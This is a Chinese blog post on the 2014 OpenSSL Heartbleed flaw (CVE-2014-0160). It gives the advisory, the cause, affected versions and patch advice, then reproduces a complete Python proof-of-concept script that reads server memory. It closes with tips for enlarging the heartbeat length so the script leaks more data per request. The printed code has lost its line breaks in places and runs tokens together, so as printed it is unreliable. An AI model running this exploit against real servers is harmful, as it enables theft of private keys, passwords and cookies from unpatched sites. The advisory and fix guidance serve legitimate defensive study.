zoukankan      html  css  js  c++  java
  • OpenSSL重大漏洞-Heartbleed之漏洞利用脚本POC讲解

    OpenSSL Security Advisory [07 Apr 2014]

    ========================================

    TLS heartbeat read overrun (CVE-2014-0160)

    ==========================================

    A missing bounds check in the handling of the TLS heartbeat extension can be used to reveal up to 64k of memory to a connected client or server.

    Only 1.0.1 and 1.0.2-beta releases of OpenSSL are affected including 1.0.1f and 1.0.2-beta1.

    Thanks for Neel Mehta of Google Security for discovering this bug and to Adam Langley <agl@chromium.org> and Bodo Moeller <bmoeller@acm.org> for preparing the fix.

    Affected users should upgrade to OpenSSL 1.0.1g. Users unable to immediately upgrade can alternatively recompile OpenSSL with -DOPENSSL_NO_HEARTBEATS.

    1.0.2 will be fixed in 1.0.2-beta2.

    在 heartbleed 的官网上有关于 CVE-2014-0160 漏洞的详细信息,这是关于 OpenSSL 的信息泄漏漏洞导致的安全问题。改 Heartbleed bug 可以让互联网的任何人读取系统保护内存,这种妥协密钥用于识别服务提供者和加密流量,用户名和密码的和实际的内容。该漏洞允许攻击者窃听通讯,并通过模拟 服务提供者和用户来直接从服务提供者盗取数据。


    此漏洞为本年度互联网上最严重的安全漏洞,影响至少两亿中国网民。需要在https开头网址登录的网站,初步评估有不少于30%的网站中招,其中包括大家最常用的购物、网银、社交、门户等知名网站。”

    石晓虹介绍说,目前国内使用https的网站都是跟支付和敏感用户数据相关的。据他了解,今天下午,大量网站已开始紧急修复此OpenSSL高危漏洞,但是修复此漏洞普遍需要半个小时到一个小时时间,大型网站修复时间会更长一些。

    石晓虹提醒广大互联网服务商,尽快将OpenSSL升级至1.0.1g进行修复。同时建议广大网友,在此漏洞得到修复前,暂时不要在受到漏洞影响的网站上登录账号。

    OpenSSL是为网络通信提供安全及数据完整性的一种安全协议,囊括了主要的密码算法、常用的密钥和证书封装管理功能以及SSL协议,目前正在各大网银、在线支付、电商网站、门户网站、电子邮件等重要网站上广泛使用。

    OpenSSL“心脏出血”漏洞利用方式

    利用该漏洞,黑客坐在自己家里电脑前,就可以实时获取到约30%的https开头网址的用户登录账号和密码、cookie等敏感数据,影响网银、知名购物网站等。

    漏洞成因

    OpenSSL Heartbleed模块存在一个BUG,当攻击者构造一个特殊的数据包,满足用户心跳包中无法提供足够多的数据会导致memcpy把SSLv3记录之后 的数据直接输出,该漏洞导致攻击者可以远程读取存在漏洞版本的openssl服务器内存中长大64K的数据。

    存在该漏洞的版本

    OpenSSL 1.0.1 through 1.0.1f (inclusive) are vulnerable

    OpenSSL 1.0.1g is NOT vulnerable

    OpenSSL 1.0.0 branch is NOT vulnerable

    OpenSSL 0.9.8 branch is NOT vulnerable

    修复建议

    使用低版本SSL的网站,并尽快按如下方案修复该漏洞:

    升级OpenSSL 1.0.1g

    使用-DOPENSSL_NO_HEARTBEATS参数重新编译低版本的OpenSSL以禁用Heartbleed模块


    修补方式:OpenSSL "heartbleed" 的安全漏洞


    OpenSSL “heartbleed” 漏洞利用程序脚本 POC:

    openssl.py / ssltest.py,用法:openssl.py ip/域名 -p 端口

    #!/usr/bin/python# Quick and dirty demonstration of CVE-2014-0160 by Jared Stafford (jspenguin@jspenguin.org)# The author disclaims copyright to this source code.import sys
    import struct
    import socket
    import time
    import select
    import re
    from optparse importOptionParser
    
    options =OptionParser(usage='%prog server [options]', description='Test for SSL heartbeat vulnerability (CVE-2014-0160)')
    options.add_option('-p','--port', type='int', default=443, help='TCP port to test (default: 443)')def h2bin(x):return x.replace(' ','').replace('
    ','').decode('hex')
    
    hello = h2bin('''
    16 03 02 00  dc 01 00 00 d8 03 02 53
    43 5b 90 9d 9b 72 0b bc  0c bc 2b 92 a8 48 97 cf
    bd 39 04 cc 16 0a 85 03  90 9f 77 04 33 d4 de 00
    00 66 c0 14 c0 0a c0 22  c0 21 00 39 00 38 00 88
    00 87 c0 0f c0 05 00 35  00 84 c0 12 c0 08 c0 1c
    c0 1b 00 16 00 13 c0 0d  c0 03 00 0a c0 13 c0 09
    c0 1f c0 1e 00 33 00 32  00 9a 00 99 00 45 00 44
    c0 0e c0 04 00 2f 00 96  00 41 c0 11 c0 07 c0 0c
    c0 02 00 05 00 04 00 15  00 12 00 09 00 14 00 11
    00 08 00 06 00 03 00 ff  01 00 00 49 00 0b 00 04
    03 00 01 02 00 0a 00 34  00 32 00 0e 00 0d 00 19
    00 0b 00 0c 00 18 00 09  00 0a 00 16 00 17 00 08
    00 06 00 07 00 14 00 15  00 04 00 05 00 12 00 13
    00 01 00 02 00 03 00 0f  00 10 00 11 00 23 00 00
    00 0f 00 01 01                                  
    ''')
    
    hb = h2bin(''' 
    18 03 02 00 03
    01 40 00
    ''')def hexdump(s):for b in xrange(0, len(s),16):
            lin =[c for c in s[b : b +16]]
            hxdat =' '.join('%02X'% ord(c)for c in lin)
            pdat =''.join((c if32<= ord(c)<=126else'.')for c in lin)print'  %04x: %-48s %s'%(b, hxdat, pdat)printdef recvall(s, length, timeout=5):
        endtime = time.time()+ timeout
        rdata =''
        remain = length
        while remain >0:
            rtime = endtime - time.time()if rtime <0:returnNone
            r, w, e = select.select([s],[],[],5)if s in r:
                data = s.recv(remain)# EOF?ifnot data:returnNone
                rdata += data
                remain -= len(data)return rdata
            
    
    def recvmsg(s):
        hdr = recvall(s,5)if hdr isNone:print'Unexpected EOF receiving record header - server closed connection'returnNone,None,None
        typ, ver, ln = struct.unpack('>BHH', hdr)
        pay = recvall(s, ln,10)if pay isNone:print'Unexpected EOF receiving record payload - server closed connection'returnNone,None,Noneprint' ... received message: type = %d, ver = %04x, length = %d'%(typ, ver, len(pay))return typ, ver, pay
    
    def hit_hb(s):
        s.send(hb)whileTrue:
            typ, ver, pay = recvmsg(s)if typ isNone:print'No heartbeat response received, server likely not vulnerable'returnFalseif typ ==24:print'Received heartbeat response:'
                hexdump(pay)if len(pay)>3:print'WARNING: server returned more data than it should - server is vulnerable!'else:print'Server processed malformed heartbeat, but did not return any extra data.'returnTrueif typ ==21:print'Received alert:'
                hexdump(pay)print'Server returned error, likely not vulnerable'returnFalsedef main():
        opts, args = options.parse_args()if len(args)<1:
            options.print_help()return
    
        s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)print'Connecting...'
        sys.stdout.flush()
        s.connect((args[0], opts.port))print'Sending Client Hello...'
        sys.stdout.flush()
        s.send(hello)print'Waiting for Server Hello...'
        sys.stdout.flush()whileTrue:
            typ, ver, pay = recvmsg(s)if typ ==None:print'Server closed connection without sending Server Hello.'return# Look for server hello done message.if typ ==22and ord(pay[0])==0x0E:breakprint'Sending heartbeat request...'
        sys.stdout.flush()
        s.send(hb)
        hit_hb(s)if __name__ =='__main__':
        main()

    下载地址:

    openssl.py.rarssltest.py.rar,(提示:其实这俩文件内容完全一样,只是换行符制式不一样。)

    提示:

    poc作者留了一手,每次只dump 16kb 内存。

    那个python poc里面的:

    hb = h2bin('''
    18 03 02 00 03
    01 40 00
    ''')改成
    
    hb = h2bin('''
    18 03 02 00 03
    01 ff ff
    ''')
    for b in xrange(0, len(s),16):改成for b in xrange(0, len(s),64):
  • 相关阅读:
    springMVC+ajax分页查询
    SSM ( Spring 、 SpringMVC 和 Mybatis )配置详解
    Spring整合Hibernate详细步骤
    Spring AOP 注解和xml实现 --转载
    spring笔记--使用springAPI以及自定义类 实现AOP的一个例子
    SSH框架总结(框架分析+环境搭建+实例源码下载) 《转》
    对Spring的IoC和DI最生动的解释
    [转载]jQuery.extend 函数详解
    [转载]Request、Request.Form和Request.QueryString的区别
    [转载]用纯css改变下拉列表select框的默认样式
  • 原文地址:https://www.cnblogs.com/milantgh/p/3728350.html
Copyright © 2011-2022 走看看